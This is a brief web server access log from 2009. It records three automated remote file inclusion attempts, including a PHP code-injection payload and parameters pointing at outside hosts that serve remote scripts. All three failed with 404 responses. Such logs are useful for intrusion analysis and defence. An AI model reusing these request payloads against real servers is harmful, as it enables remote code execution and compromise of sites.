61.100.5.136 - - [12/Sep/2009:05:32:10 -0400] "GET /logs/access_log.Q109053000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.120.226.113 - - [12/Sep/2009:05:32:16 -0400] "GET /logs/access_log.Q109081000/init_basic.php?GALLERY_BASEDIR=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.34.169.243 - - [12/Sep/2009:05:32:49 -0400] "GET /logs/error_log.Q109060500/index.php?pag=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
